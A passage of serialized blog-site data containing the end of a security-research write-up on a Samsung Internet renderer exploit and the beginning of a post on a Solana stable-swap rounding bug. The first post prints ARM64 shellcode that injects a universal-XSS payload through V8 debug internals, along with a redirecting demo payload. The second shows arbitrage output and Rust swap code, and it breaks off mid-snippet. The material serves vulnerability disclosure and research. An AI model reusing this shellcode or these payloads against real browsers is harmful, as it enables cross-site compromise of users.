isolate",{"type":27,"tag":207,"props":9293,"children":9294},{"style":238},[9295],{"type":33,"value":1842},{"type":27,"tag":207,"props":9297,"children":9298},{"class":209,"line":244},[9299,9304,9308,9312,9317,9322],{"type":27,"tag":207,"props":9300,"children":9301},{"style":8920},[9302],{"type":33,"value":9303}," Handle",{"type":27,"tag":207,"props":9305,"children":9306},{"style":238},[9307],{"type":33,"value":9257},{"type":27,"tag":207,"props":9309,"children":9310},{"style":8920},[9311],{"type":33,"value":8863},{"type":27,"tag":207,"props":9313,"children":9314},{"style":238},[9315],{"type":33,"value":9316},"> ",{"type":27,"tag":207,"props":9318,"children":9319},{"style":220},[9320],{"type":33,"value":9321},"source",{"type":27,"tag":207,"props":9323,"children":9324},{"style":238},[9325],{"type":33,"value":1842},{"type":27,"tag":207,"props":9327,"children":9328},{"class":209,"line":270},[9329,9334,9339,9344],{"type":27,"tag":207,"props":9330,"children":9331},{"style":238},[9332],{"type":33,"value":9333}," debug::",{"type":27,"tag":207,"props":9335,"children":9336},{"style":8920},[9337],{"type":33,"value":9338},"EvaluateGlobalMode",{"type":27,"tag":207,"props":9340,"children":9341},{"style":220},[9342],{"type":33,"value":9343}," mode",{"type":27,"tag":207,"props":9345,"children":9346},{"style":238},[9347],{"type":33,"value":1842},{"type":27,"tag":207,"props":9349,"children":9350},{"class":209,"line":296},[9351,9356,9361],{"type":27,"tag":207,"props":9352,"children":9353},{"style":8920},[9354],{"type":33,"value":9355}," REPLMode",{"type":27,"tag":207,"props":9357,"children":9358},{"style":220},[9359],{"type":33,"value":9360}," repl_mode",{"type":27,"tag":207,"props":9362,"children":9363},{"style":238},[9364],{"type":33,"value":1455},{"type":27,"tag":36,"props":9366,"children":9367},{},[9368,9370,9375,9377,9382,9384,9389,9391,9397,9398,9404],{"type":33,"value":9369},"We must supply the ",{"type":27,"tag":84,"props":9371,"children":9373},{"className":9372},[],[9374],{"type":33,"value":8932},{"type":33,"value":9376}," pointer, a ",{"type":27,"tag":84,"props":9378,"children":9380},{"className":9379},[],[9381],{"type":33,"value":8863},{"type":33,"value":9383}," object containing our XSS payload as ",{"type":27,"tag":84,"props":9385,"children":9387},{"className":9386},[],[9388],{"type":33,"value":9321},{"type":33,"value":9390},", and the ",{"type":27,"tag":84,"props":9392,"children":9394},{"className":9393},[],[9395],{"type":33,"value":9396},"mode",{"type":33,"value":1131},{"type":27,"tag":84,"props":9399,"children":9401},{"className":9400},[],[9402],{"type":33,"value":9403},"repl_mode",{"type":33,"value":9405}," values, which are simple enum literals.",{"type":27,"tag":36,"props":9407,"children":9408},{},[9409,9411,9416,9418,9424,9426,9431,9433,9438,9440,9446,9448,9454,9456,9461,9463,9469,9471,9477,9479,9484],{"type":33,"value":9410},"To obtain the ",{"type":27,"tag":84,"props":9412,"children":9414},{"className":9413},[],[9415],{"type":33,"value":8932},{"type":33,"value":9417}," pointer within our shellcode, we call ",{"type":27,"tag":84,"props":9419,"children":9421},{"className":9420},[],[9422],{"type":33,"value":9423},"Isolate::TryGetCurrent()",{"type":33,"value":9425},", which returns the current ",{"type":27,"tag":84,"props":9427,"children":9429},{"className":9428},[],[9430],{"type":33,"value":8932},{"type":33,"value":9432},". To construct a valid ",{"type":27,"tag":84,"props":9434,"children":9436},{"className":9435},[],[9437],{"type":33,"value":8863},{"type":33,"value":9439}," object holding our payload, we call ",{"type":27,"tag":84,"props":9441,"children":9443},{"className":9442},[],[9444],{"type":33,"value":9445},"v8::String::NewFromUTF8",{"type":33,"value":9447},". This ",{"type":27,"tag":84,"props":9449,"children":9451},{"className":9450},[],[9452],{"type":33,"value":9453},"NewFromUTF8",{"type":33,"value":9455}," function takes four arguments: the ",{"type":27,"tag":84,"props":9457,"children":9459},{"className":9458},[],[9460],{"type":33,"value":8932},{"type":33,"value":9462},", the string bytes as ",{"type":27,"tag":84,"props":9464,"children":9466},{"className":9465},[],[9467],{"type":33,"value":9468},"data",{"type":33,"value":9470},", an enum literal specifying the string type, and ",{"type":27,"tag":84,"props":9472,"children":9474},{"className":9473},[],[9475],{"type":33,"value":9476},"length",{"type":33,"value":9478},", which is the size of the ",{"type":27,"tag":84,"props":9480,"children":9482},{"className":9481},[],[9483],{"type":33,"value":9468},{"type":33,"value":9485}," buffer.",{"type":27,"tag":36,"props":9487,"children":9488},{},[9489],{"type":33,"value":9490},"The resulting shellcode that executes our XSS payload looks like this:",{"type":27,"tag":101,"props":9492,"children":9494},{"code":9493,"language":7727,"meta":7,"className":7728,"style":7},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\nmovz x1, #0xf7a0\nmovk x1, #0x0071, lsl #16\nadd x9, x12, x1\nmovz x1, #0x5ac8\nmovk x1, #0x054f, lsl #16\nadd x0, x12, x1\nblr x9\n// *x0 is isolate pointer\n// store isolate ptr to stack\nldr x13, [x0]\nstr x13, [sp, #-16]!\n\n// store x10 = v8::String::NewFromUTF8\nmovz x1, #0x1140\nmovk x1, #0x0242, lsl #16\nsub x10, x12, x1\n\n// mmap a RW page for our xss payload\nmov x0, #0\nmov x1, #{page_align(len(XSS_PAYLOAD))}\nmov x2, #3\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\n// write our xss payload to mmapped rw page\n{write_str(XSS_PAYLOAD, \"x0\")}\n\n// store x11 = XSS_PAYLOAD string\nmov x11, x0\n\n// pop back isolate pointer\nldr x13, [sp], #16\n\n// at this point:\n// x13 = isolate *\n// x11 = XSS_PAYLOAD string mmapped region\n// x10 = v8::String::NewFromUtf8\n\n// call v8::String::NewFromUTF8 with our xss_payload\n// arg0 = isolate *\nmov x0, x13\n// arg1 = char *c_str\nmov x1, x11\n// arg2 = type = kNormal\nmov x2, #0\n// arg4 = length\nmov w3, #{len(XSS_PAYLOAD)}\n// call NewFromUTF8\nblr x10\n\n// store x14 = String XSS_PAYLOAD\nmov x14, x0\n\n// store x9 = v8::internal::DebugEvaluate::Global\nmovz x1, #0xe44c\nmovk x1, #0x014e, lsl #16\nsub x9, x12, x1\n\n// call v8::internal::DebugEvaluate::Global\n// arg0 = isolate *\nmov x0, x13\n// arg1 = String *source\nmov x1, x14\n// arg2 = mode = kDefault\nmov x2, #0\n// arg3 = repl_mode = kYes\nmov x3, #0\n\nblr x9\n",[9495],{"type":27,"tag":84,"props":9496,"children":9497},{"__ignoreMap":7},[9498,9506,9514,9522,9530,9538,9546,9554,9562,9570,9578,9586,9594,9601,9609,9617,9625,9633,9640,9648,9655,9663,9671,9678,9685,9692,9699,9706,9713,9721,9729,9736,9744,9752,9759,9767,9775,9782,9789,9797,9805,9813,9820,9828,9836,9844,9852,9860,9868,9876,9884,9892,9900,9908,9915,9923,9931,9939,9948,9957,9966,9975,9983,9992,10000,10008,10017,10026,10035,10043,10052,10061,10069],{"type":27,"tag":207,"props":9499,"children":9500},{"class":209,"line":210},[9501],{"type":27,"tag":207,"props":9502,"children":9503},{},[9504],{"type":33,"value":9505},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\n",{"type":27,"tag":207,"props":9507,"children":9508},{"class":209,"line":244},[9509],{"type":27,"tag":207,"props":9510,"children":9511},{},[9512],{"type":33,"value":9513},"movz x1, #0xf7a0\n",{"type":27,"tag":207,"props":9515,"children":9516},{"class":209,"line":270},[9517],{"type":27,"tag":207,"props":9518,"children":9519},{},[9520],{"type":33,"value":9521},"movk x1, #0x0071, lsl #16\n",{"type":27,"tag":207,"props":9523,"children":9524},{"class":209,"line":296},[9525],{"type":27,"tag":207,"props":9526,"children":9527},{},[9528],{"type":33,"value":9529},"add x9, x12, x1\n",{"type":27,"tag":207,"props":9531,"children":9532},{"class":209,"line":445},[9533],{"type":27,"tag":207,"props":9534,"children":9535},{},[9536],{"type":33,"value":9537},"movz x1, #0x5ac8\n",{"type":27,"tag":207,"props":9539,"children":9540},{"class":209,"line":867},[9541],{"type":27,"tag":207,"props":9542,"children":9543},{},[9544],{"type":33,"value":9545},"movk x1, #0x054f, lsl #16\n",{"type":27,"tag":207,"props":9547,"children":9548},{"class":209,"line":892},[9549],{"type":27,"tag":207,"props":9550,"children":9551},{},[9552],{"type":33,"value":9553},"add x0, x12, x1\n",{"type":27,"tag":207,"props":9555,"children":9556},{"class":209,"line":1475},[9557],{"type":27,"tag":207,"props":9558,"children":9559},{},[9560],{"type":33,"value":9561},"blr x9\n",{"type":27,"tag":207,"props":9563,"children":9564},{"class":209,"line":2065},[9565],{"type":27,"tag":207,"props":9566,"children":9567},{},[9568],{"type":33,"value":9569},"// *x0 is isolate pointer\n",{"type":27,"tag":207,"props":9571,"children":9572},{"class":209,"line":2092},[9573],{"type":27,"tag":207,"props":9574,"children":9575},{},[9576],{"type":33,"value":9577},"// store isolate ptr to stack\n",{"type":27,"tag":207,"props":9579,"children":9580},{"class":209,"line":2130},[9581],{"type":27,"tag":207,"props":9582,"children":9583},{},[9584],{"type":33,"value":9585},"ldr x13, [x0]\n",{"type":27,"tag":207,"props":9587,"children":9588},{"class":209,"line":2168},[9589],{"type":27,"tag":207,"props":9590,"children":9591},{},[9592],{"type":33,"value":9593},"str x13, [sp, #-16]!\n",{"type":27,"tag":207,"props":9595,"children":9596},{"class":209,"line":4095},[9597],{"type":27,"tag":207,"props":9598,"children":9599},{"emptyLinePlaceholder":19},[9600],{"type":33,"value":2062},{"type":27,"tag":207,"props":9602,"children":9603},{"class":209,"line":4103},[9604],{"type":27,"tag":207,"props":9605,"children":9606},{},[9607],{"type":33,"value":9608},"// store x10 = v8::String::NewFromUTF8\n",{"type":27,"tag":207,"props":9610,"children":9611},{"class":209,"line":4154},[9612],{"type":27,"tag":207,"props":9613,"children":9614},{},[9615],{"type":33,"value":9616},"movz x1, #0x1140\n",{"type":27,"tag":207,"props":9618,"children":9619},{"class":209,"line":4203},[9620],{"type":27,"tag":207,"props":9621,"children":9622},{},[9623],{"type":33,"value":9624},"movk x1, #0x0242, lsl #16\n",{"type":27,"tag":207,"props":9626,"children":9627},{"class":209,"line":4249},[9628],{"type":27,"tag":207,"props":9629,"children":9630},{},[9631],{"type":33,"value":9632},"sub x10, x12, x1\n",{"type":27,"tag":207,"props":9634,"children":9635},{"class":209,"line":4290},[9636],{"type":27,"tag":207,"props":9637,"children":9638},{"emptyLinePlaceholder":19},[9639],{"type":33,"value":2062},{"type":27,"tag":207,"props":9641,"children":9642},{"class":209,"line":4304},[9643],{"type":27,"tag":207,"props":9644,"children":9645},{},[9646],{"type":33,"value":9647},"// mmap a RW page for our xss payload\n",{"type":27,"tag":207,"props":9649,"children":9650},{"class":209,"line":5466},[9651],{"type":27,"tag":207,"props":9652,"children":9653},{},[9654],{"type":33,"value":7949},{"type":27,"tag":207,"props":9656,"children":9657},{"class":209,"line":5530},[9658],{"type":27,"tag":207,"props":9659,"children":9660},{},[9661],{"type":33,"value":9662},"mov x1, #{page_align(len(XSS_PAYLOAD))}\n",{"type":27,"tag":207,"props":9664,"children":9665},{"class":209,"line":7900},[9666],{"type":27,"tag":207,"props":9667,"children":9668},{},[9669],{"type":33,"value":9670},"mov x2, #3\n",{"type":27,"tag":207,"props":9672,"children":9673},{"class":209,"line":7909},[9674],{"type":27,"tag":207,"props":9675,"children":9676},{},[9677],{"type":33,"value":7975},{"type":27,"tag":207,"props":9679,"children":9680},{"class":209,"line":7917},[9681],{"type":27,"tag":207,"props":9682,"children":9683},{},[9684],{"type":33,"value":7984},{"type":27,"tag":207,"props":9686,"children":9687},{"class":209,"line":7926},[9688],{"type":27,"tag":207,"props":9689,"children":9690},{},[9691],{"type":33,"value":7993},{"type":27,"tag":207,"props":9693,"children":9694},{"class":209,"line":7934},[9695],{"type":27,"tag":207,"props":9696,"children":9697},{},[9698],{"type":33,"value":8002},{"type":27,"tag":207,"props":9700,"children":9701},{"class":209,"line":7943},[9702],{"type":27,"tag":207,"props":9703,"children":9704},{},[9705],{"type":33,"value":7906},{"type":27,"tag":207,"props":9707,"children":9708},{"class":209,"line":7952},[9709],{"type":27,"tag":207,"props":9710,"children":9711},{"emptyLinePlaceholder":19},[9712],{"type":33,"value":2062},{"type":27,"tag":207,"props":9714,"children":9715},{"class":209,"line":7961},[9716],{"type":27,"tag":207,"props":9717,"children":9718},{},[9719],{"type":33,"value":9720},"// write our xss payload to mmapped rw page\n",{"type":27,"tag":207,"props":9722,"children":9723},{"class":209,"line":7969},[9724],{"type":27,"tag":207,"props":9725,"children":9726},{},[9727],{"type":33,"value":9728},"{write_str(XSS_PAYLOAD, \"x0\")}\n",{"type":27,"tag":207,"props":9730,"children":9731},{"class":209,"line":7978},[9732],{"type":27,"tag":207,"props":9733,"children":9734},{"emptyLinePlaceholder":19},[9735],{"type":33,"value":2062},{"type":27,"tag":207,"props":9737,"children":9738},{"class":209,"line":7987},[9739],{"type":27,"tag":207,"props":9740,"children":9741},{},[9742],{"type":33,"value":9743},"// store x11 = XSS_PAYLOAD string\n",{"type":27,"tag":207,"props":9745,"children":9746},{"class":209,"line":7996},[9747],{"type":27,"tag":207,"props":9748,"children":9749},{},[9750],{"type":33,"value":9751},"mov x11, x0\n",{"type":27,"tag":207,"props":9753,"children":9754},{"class":209,"line":8005},[9755],{"type":27,"tag":207,"props":9756,"children":9757},{"emptyLinePlaceholder":19},[9758],{"type":33,"value":2062},{"type":27,"tag":207,"props":9760,"children":9761},{"class":209,"line":8013},[9762],{"type":27,"tag":207,"props":9763,"children":9764},{},[9765],{"type":33,"value":9766},"// pop back isolate pointer\n",{"type":27,"tag":207,"props":9768,"children":9769},{"class":209,"line":8021},[9770],{"type":27,"tag":207,"props":9771,"children":9772},{},[9773],{"type":33,"value":9774},"ldr x13, [sp], #16\n",{"type":27,"tag":207,"props":9776,"children":9777},{"class":209,"line":8029},[9778],{"type":27,"tag":207,"props":9779,"children":9780},{"emptyLinePlaceholder":19},[9781],{"type":33,"value":2062},{"type":27,"tag":207,"props":9783,"children":9784},{"class":209,"line":8037},[9785],{"type":27,"tag":207,"props":9786,"children":9787},{},[9788],{"type":33,"value":8043},{"type":27,"tag":207,"props":9790,"children":9791},{"class":209,"line":8046},[9792],{"type":27,"tag":207,"props":9793,"children":9794},{},[9795],{"type":33,"value":9796},"// x13 = isolate *\n",{"type":27,"tag":207,"props":9798,"children":9799},{"class":209,"line":8055},[9800],{"type":27,"tag":207,"props":9801,"children":9802},{},[9803],{"type":33,"value":9804},"// x11 = XSS_PAYLOAD string mmapped region\n",{"type":27,"tag":207,"props":9806,"children":9807},{"class":209,"line":8064},[9808],{"type":27,"tag":207,"props":9809,"children":9810},{},[9811],{"type":33,"value":9812},"// x10 = v8::String::NewFromUtf8\n",{"type":27,"tag":207,"props":9814,"children":9815},{"class":209,"line":8072},[9816],{"type":27,"tag":207,"props":9817,"children":9818},{"emptyLinePlaceholder":19},[9819],{"type":33,"value":2062},{"type":27,"tag":207,"props":9821,"children":9822},{"class":209,"line":8081},[9823],{"type":27,"tag":207,"props":9824,"children":9825},{},[9826],{"type":33,"value":9827},"// call v8::String::NewFromUTF8 with our xss_payload\n",{"type":27,"tag":207,"props":9829,"children":9830},{"class":209,"line":8090},[9831],{"type":27,"tag":207,"props":9832,"children":9833},{},[9834],{"type":33,"value":9835},"// arg0 = isolate *\n",{"type":27,"tag":207,"props":9837,"children":9838},{"class":209,"line":8098},[9839],{"type":27,"tag":207,"props":9840,"children":9841},{},[9842],{"type":33,"value":9843},"mov x0, x13\n",{"type":27,"tag":207,"props":9845,"children":9846},{"class":209,"line":8107},[9847],{"type":27,"tag":207,"props":9848,"children":9849},{},[9850],{"type":33,"value":9851},"// arg1 = char *c_str\n",{"type":27,"tag":207,"props":9853,"children":9854},{"class":209,"line":8116},[9855],{"type":27,"tag":207,"props":9856,"children":9857},{},[9858],{"type":33,"value":9859},"mov x1, x11\n",{"type":27,"tag":207,"props":9861,"children":9862},{"class":209,"line":8125},[9863],{"type":27,"tag":207,"props":9864,"children":9865},{},[9866],{"type":33,"value":9867},"// arg2 = type = kNormal\n",{"type":27,"tag":207,"props":9869,"children":9870},{"class":209,"line":8133},[9871],{"type":27,"tag":207,"props":9872,"children":9873},{},[9874],{"type":33,"value":9875},"mov x2, #0\n",{"type":27,"tag":207,"props":9877,"children":9878},{"class":209,"line":8142},[9879],{"type":27,"tag":207,"props":9880,"children":9881},{},[9882],{"type":33,"value":9883},"// arg4 = length\n",{"type":27,"tag":207,"props":9885,"children":9886},{"class":209,"line":8151},[9887],{"type":27,"tag":207,"props":9888,"children":9889},{},[9890],{"type":33,"value":9891},"mov w3, #{len(XSS_PAYLOAD)}\n",{"type":27,"tag":207,"props":9893,"children":9894},{"class":209,"line":8160},[9895],{"type":27,"tag":207,"props":9896,"children":9897},{},[9898],{"type":33,"value":9899},"// call NewFromUTF8\n",{"type":27,"tag":207,"props":9901,"children":9902},{"class":209,"line":8169},[9903],{"type":27,"tag":207,"props":9904,"children":9905},{},[9906],{"type":33,"value":9907},"blr x10\n",{"type":27,"tag":207,"props":9909,"children":9910},{"class":209,"line":8177},[9911],{"type":27,"tag":207,"props":9912,"children":9913},{"emptyLinePlaceholder":19},[9914],{"type":33,"value":2062},{"type":27,"tag":207,"props":9916,"children":9917},{"class":209,"line":8185},[9918],{"type":27,"tag":207,"props":9919,"children":9920},{},[9921],{"type":33,"value":9922},"// store x14 = String XSS_PAYLOAD\n",{"type":27,"tag":207,"props":9924,"children":9925},{"class":209,"line":8194},[9926],{"type":27,"tag":207,"props":9927,"children":9928},{},[9929],{"type":33,"value":9930},"mov x14, x0\n",{"type":27,"tag":207,"props":9932,"children":9934},{"class":209,"line":9933},57,[9935],{"type":27,"tag":207,"props":9936,"children":9937},{"emptyLinePlaceholder":19},[9938],{"type":33,"value":2062},{"type":27,"tag":207,"props":9940,"children":9942},{"class":209,"line":9941},58,[9943],{"type":27,"tag":207,"props":9944,"children":9945},{},[9946],{"type":33,"value":9947},"// store x9 = v8::internal::DebugEvaluate::Global\n",{"type":27,"tag":207,"props":9949,"children":9951},{"class":209,"line":9950},59,[9952],{"type":27,"tag":207,"props":9953,"children":9954},{},[9955],{"type":33,"value":9956},"movz x1, #0xe44c\n",{"type":27,"tag":207,"props":9958,"children":9960},{"class":209,"line":9959},60,[9961],{"type":27,"tag":207,"props":9962,"children":9963},{},[9964],{"type":33,"value":9965},"movk x1, #0x014e, lsl #16\n",{"type":27,"tag":207,"props":9967,"children":9969},{"class":209,"line":9968},61,[9970],{"type":27,"tag":207,"props":9971,"children":9972},{},[9973],{"type":33,"value":9974},"sub x9, x12, x1\n",{"type":27,"tag":207,"props":9976,"children":9978},{"class":209,"line":9977},62,[9979],{"type":27,"tag":207,"props":9980,"children":9981},{"emptyLinePlaceholder":19},[9982],{"type":33,"value":2062},{"type":27,"tag":207,"props":9984,"children":9986},{"class":209,"line":9985},63,[9987],{"type":27,"tag":207,"props":9988,"children":9989},{},[9990],{"type":33,"value":9991},"// call v8::internal::DebugEvaluate::Global\n",{"type":27,"tag":207,"props":9993,"children":9995},{"class":209,"line":9994},64,[9996],{"type":27,"tag":207,"props":9997,"children":9998},{},[9999],{"type":33,"value":9835},{"type":27,"tag":207,"props":10001,"children":10003},{"class":209,"line":10002},65,[10004],{"type":27,"tag":207,"props":10005,"children":10006},{},[10007],{"type":33,"value":9843},{"type":27,"tag":207,"props":10009,"children":10011},{"class":209,"line":10010},66,[10012],{"type":27,"tag":207,"props":10013,"children":10014},{},[10015],{"type":33,"value":10016},"// arg1 = String *source\n",{"type":27,"tag":207,"props":10018,"children":10020},{"class":209,"line":10019},67,[10021],{"type":27,"tag":207,"props":10022,"children":10023},{},[10024],{"type":33,"value":10025},"mov x1, x14\n",{"type":27,"tag":207,"props":10027,"children":10029},{"class":209,"line":10028},68,[10030],{"type":27,"tag":207,"props":10031,"children":10032},{},[10033],{"type":33,"value":10034},"// arg2 = mode = kDefault\n",{"type":27,"tag":207,"props":10036,"children":10038},{"class":209,"line":10037},69,[10039],{"type":27,"tag":207,"props":10040,"children":10041},{},[10042],{"type":33,"value":9875},{"type":27,"tag":207,"props":10044,"children":10046},{"class":209,"line":10045},70,[10047],{"type":27,"tag":207,"props":10048,"children":10049},{},[10050],{"type":33,"value":10051},"// arg3 = repl_mode = kYes\n",{"type":27,"tag":207,"props":10053,"children":10055},{"class":209,"line":10054},71,[10056],{"type":27,"tag":207,"props":10057,"children":10058},{},[10059],{"type":33,"value":10060},"mov x3, #0\n",{"type":27,"tag":207,"props":10062,"children":10064},{"class":209,"line":10063},72,[10065],{"type":27,"tag":207,"props":10066,"children":10067},{"emptyLinePlaceholder":19},[10068],{"type":33,"value":2062},{"type":27,"tag":207,"props":10070,"children":10072},{"class":209,"line":10071},73,[10073],{"type":27,"tag":207,"props":10074,"children":10075},{},[10076],{"type":33,"value":9561},{"type":27,"tag":58,"props":10078,"children":10080},{"id":10079},"uxss-demo",[10081],{"type":33,"value":10082},"UXSS Demo",{"type":27,"tag":36,"props":10084,"children":10085},{},[10086,10088,10094],{"type":33,"value":10087},"Below is a demo that executes the following UXSS payload: ",{"type":27,"tag":84,"props":10089,"children":10091},{"className":10090},[],[10092],{"type":33,"value":10093},"alert(document.domain); window.location.href = \"https://cor.team/\";",{"type":33,"value":1041},{"type":27,"tag":10096,"props":10097,"children":10100},"video",{"className":10098,"controls":19},[10099],"blog-video-responsive",[10101,10103,10108],{"type":33,"value":10102},"\n ",{"type":27,"tag":9321,"props":10104,"children":10107},{"src":10105,"type":10106},"/posts/mobile-renderer-rce/demo.mp4","video/mp4",[],{"type":33,"value":10109},"\n Your browser does not support the video tag.\n",{"type":27,"tag":28,"props":10111,"children":10113},{"id":10112},"conclusion",[10114],{"type":33,"value":10115},"Conclusion",{"type":27,"tag":36,"props":10117,"children":10118},{},[10119],{"type":33,"value":10120},"Given the complex nature of the modern software ecosystem, it is unsurprising to find core out of date libraries in popular applications. Samsung Internet relied on a six month old version of V8, a JavaScript engine where researchers frequently discover new vulnerabilities, providing us a large window for n-day exploitation.",{"type":27,"tag":36,"props":10122,"children":10123},{},[10124],{"type":33,"value":10125},"While renderer bugs are usually chained with another exploit such as a sandbox escape, we pushed the capabilities of the bug by targeting the weaker Site Isolation mechanism on mobile. As most web pages ran under the same process, we could inject shellcode into the JavaScript interpreter to achieve universal XSS in Samsung Internet browser.",{"type":27,"tag":10127,"props":10128,"children":10129},"style",{},[10130],{"type":33,"value":10131},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":244,"depth":244,"links":10133},[10134,10138,10141,10151],{"id":30,"depth":244,"text":34,"children":10135},[10136,10137],{"id":60,"depth":270,"text":63},{"id":146,"depth":270,"text":149},{"id":179,"depth":244,"text":182,"children":10139},[10140],{"id":340,"depth":270,"text":174},{"id":494,"depth":244,"text":497,"children":10142},[10143,10144,10145,10146,10147,10148,10149,10150],{"id":500,"depth":270,"text":503},{"id":964,"depth":270,"text":967},{"id":1157,"depth":270,"text":1160},{"id":1270,"depth":270,"text":1273},{"id":1558,"depth":270,"text":1561},{"id":4326,"depth":270,"text":4329},{"id":7623,"depth":270,"text":7626},{"id":10079,"depth":270,"text":10082},{"id":10112,"depth":244,"text":10115},"markdown","content:blog:2026-04-01-patch-gap-to-mobile-renderer-rce.md","content","blog/2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce","md",[10159,12661,12999,16535,20893,26015,36268,37694,38457,42675,47692,53116,54272,57759,68145,74874,76713,78421,83085,96970,99689,104477,106916,109253,115036,130855,139184,148463],{"_path":10160,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":10161,"description":10162,"image":10163,"date":10167,"isFeatured":19,"tags":10168,"onBlogPage":19,"body":10171,"_type":10152,"_id":12658,"_source":10154,"_file":12659,"_stem":12660,"_extension":10157},"/blog/2022-04-26-spl-swap-rounding","Becoming a Millionaire, 0.000150 BTC at a Time","How we discovered a critical issue in Solana's stable swap implementation. A story about arbitrage and rounding.",{"src":10164,"width":10165,"height":10166},"/posts/spl-swap/title.jpg",600,368,"2022-04-26",[10169,10170],"solana","report",{"type":24,"children":10172,"toc":12652},[10173,10187,10192,10197,10205,10211,10216,10221,10230,10238,10243,10248,10256,10261,10266,10646,10656,10661,11183,11188,11196,11203,11209,11214,11219,11224,11231,11243,11248,11260,11497,11502,11507,11513,11518,11523,11569,11574,11582,11587,11592,11597,11741,11754,11867,11881,11889,11903,11911,11924,11929,11941,11949,11971,12589,12595,12600,12613,12626,12633,12638,12643,12648],{"type":27,"tag":36,"props":10174,"children":10175},{},[10176,10178,10185],{"type":33,"value":10177},"We discovered a critical rounding issue in the Solana Program Library's implementation of stable swap, ",{"type":27,"tag":47,"props":10179,"children":10182},{"href":10180,"rel":10181},"https://github.com/solana-labs/solana-program-library/tree/master/token-swap/program",[51],[10183],{"type":33,"value":10184},"spl-token-swap",{"type":33,"value":10186},". Similar to Neodyme's spl-token-lending exploit, we were able to extract a single token per instruction. This exceeds the value of the 5000 lamport transaction fee on BTC stable swaps, allowing an attacker to profitably drain funds.",{"type":27,"tag":36,"props":10188,"children":10189},{},[10190],{"type":33,"value":10191},"Such BTC stable swaps had over 74 million in combined value. The total value of stable swaps impacted exceed 700 million.",{"type":27,"tag":36,"props":10193,"children":10194},{},[10195],{"type":33,"value":10196},"We would also like to thank the Saber team for their fast triage and remediation.",{"type":27,"tag":36,"props":10198,"children":10199},{},[10200],{"type":27,"tag":942,"props":10201,"children":10202},{},[10203],{"type":33,"value":10204},"Rounding bugs are an increasingly common vulnerability class, enabled by low transaction costs",{"type":27,"tag":28,"props":10206,"children":10208},{"id":10207},"discovery",[10209],{"type":33,"value":10210},"Discovery",{"type":27,"tag":36,"props":10212,"children":10213},{},[10214],{"type":33,"value":10215},"Parth, one of our researchers, was implementing a graph search for our arbitrage bot to calculate the price of any token relative to SOL.",{"type":27,"tag":36,"props":10217,"children":10218},{},[10219],{"type":33,"value":10220},"After a while, he noticed something weird..",{"type":27,"tag":10222,"props":10223,"children":10224},"blockquote",{},[10225],{"type":27,"tag":36,"props":10226,"children":10227},{},[10228],{"type":33,"value":10229},"so either my graph search is wrong\nor its possible to get a ton of money out of nothing",{"type":27,"tag":101,"props":10231,"children":10233},{"code":10232},"KwnjUuZ : 0 9vMJfxu -> 1 EPjFWdd\nKwnjUuZ : 1 EPjFWdd -> 2 9vMJfxu\nKwnjUuZ : 2 9vMJfxu -> 3 EPjFWdd\nHU1tejU : 3 EPjFWdd -> 625 PRT88Rk\n24ZbKS3 : 625 PRT88Rk -> 7 EPjFWdd\n3oRPcFa : 7 EPjFWdd -> 6 BQcdHdA\n",[10234],{"type":27,"tag":84,"props":10235,"children":10236},{"__ignoreMap":7},[10237],{"type":33,"value":10232},{"type":27,"tag":36,"props":10239,"children":10240},{},[10241],{"type":33,"value":10242},"Somehow, we were getting tokens from nothing?",{"type":27,"tag":36,"props":10244,"children":10245},{},[10246],{"type":33,"value":10247},"After taking a look at the pairs on which this was occuring, we quickly realized that only stable swap pairs were impacted.",{"type":27,"tag":101,"props":10249,"children":10251},{"code":10250},"KwnjUuZhTMTSGAaavkLEmSyfobY16JNH4poL9oeeEvE\nHU1tejUtt7AZYrC9SAuqCW9MpuSqsdoedHSb1XUKjUPN\n24ZbKS36rkPv14Tdx8qv4NRyqatTaJ5KgJrT1LxBKn5d\n3oRPcFaRHvv9pPR6nRasigVDkm3k9kTjdfjxUpgLV5Pq\n",[10252],{"type":27,"tag":84,"props":10253,"children":10254},{"__ignoreMap":7},[10255],{"type":33,"value":10250},{"type":27,"tag":36,"props":10257,"children":10258},{},[10259],{"type":33,"value":10260},"This seemed suspicious. Perhaps it had something to do with the stable swap math?",{"type":27,"tag":36,"props":10262,"children":10263},{},[10264],{"type":33,"value":10265},"It was also weird how we could only ever get at most one extra token. As usual, the best way to answer such questions is to read the code. We dived into the stable swap Solana implementation to look for a possible root cause.",{"type":27,"tag":101,"props":10267,"children":10271},{"code":10268,"language":10269,"meta":7,"className":10270,"style":7}," // Solve for y by approximating: y**2 + b*y = c\n let mut y = d_val;\n for _ in 0..ITERATIONS {\n let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n if y_new == y {\n break;\n } else {\n y = y_new;\n }\n }\n","rust","language-rust shiki shiki-themes slack-dark",[10272],{"type":27,"tag":84,"props":10273,"children":10274},{"__ignoreMap":7},[10275,10283,10314,10346,10450,10555,10581,10593,10610,10630,10638],{"type":27,"tag":207,"props":10276,"children":10277},{"class":209,"line":210},[10278],{"type":27,"tag":207,"props":10279,"children":10280},{"style":4647},[10281],{"type":33,"value":10282}," // Solve for y by approximating: y**2 + b*y = c\n",{"type":27,"tag":207,"props":10284,"children":10285},{"class":209,"line":244},[10286,10291,10296,10301,10305,10310],{"type":27,"tag":207,"props":10287,"children":10288},{"style":214},[10289],{"type":33,"value":10290}," let",{"type":27,"tag":207,"props":10292,"children":10293},{"style":214},[10294],{"type":33,"value":10295}," mut",{"type":27,"tag":207,"props":10297,"children":10298},{"style":220},[10299],{"type":33,"value":10300}," y",{"type":27,"tag":207,"props":10302,"children":10303},{"style":226},[10304],{"type":33,"value":229},{"type":27,"tag":207,"props":10306,"children":10307},{"style":220},[10308],{"type":33,"value":10309}," 